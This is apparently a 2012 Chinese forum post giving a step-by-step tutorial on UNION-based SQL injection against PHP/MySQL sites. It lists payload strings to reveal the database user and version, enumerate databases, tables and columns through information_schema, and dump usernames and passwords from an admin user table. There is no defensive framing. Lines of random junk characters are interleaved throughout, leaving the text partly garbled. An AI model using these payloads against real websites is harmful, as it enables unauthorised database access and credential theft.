2 v6 L v9 s( u0 ^0 X" [6 t教程内容:Mysql 5+php 注入
* T8 y, v+ u5 X U- s5 d
" ?* `" {& F6 Y d8 c- O5 y3 w+ @, o+ i- H* S+ M+ f$ W$ _3 M- Q
, \; G# v1 M. U- }. T
一.查看MYSQL基本信息(库名,版本,用户)
6 \5 \, N$ r& S% ` N4 v* A# s' Q+ h# S+ b0 `2 \1 ^
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
' x Q0 x% o; S" h2 N
" F/ \1 ^/ X- E( }8 @( e二.查数据库
7 w7 K! _" A8 s$ b+ G! {+ f* x% ]& ?4 Y) |- ~3 P& k
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*% N$ U, D) ~% x; l$ C% `3 H N* e( m. Z
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。! q+ [6 q+ a* d2 q- |) K
2 C- t; Z/ w+ `% l% u" A三.暴表
9 H! w7 ~* {/ R5 I2 Z" t
3 R# z. j) n+ _0 Nand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
& m& f" W2 u2 o1 F$ _( X& F0 h+ ]! b
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。; M1 p0 A- x' x1 S
! i" ?5 `* u) v/ K
四.暴字段
. x( s& E( t& h- l- z/ U, M0 i8 q7 ?+ }/ ^- W; o# K
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*9 V3 D: x* k$ y' S& u! X8 P; k
& r9 ]$ z( L: q% b9 N) T
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
6 Q B: }; c/ Y$ G
M% a! s- H9 e# ?五.暴数据6 J U2 }, x: L* m. {+ g' |4 y; v
" \$ u+ s. y4 {/ k
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
) Y* W% e. ]: r' d' _1 J5 ~5 x, h8 A0 o2 z) u' k
* }1 q M* M: I这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
1 s, V6 L/ _3 Y5 ]# T3 V* ^ |
发表于 2012-9-13 16:27:53
收藏
支持
反对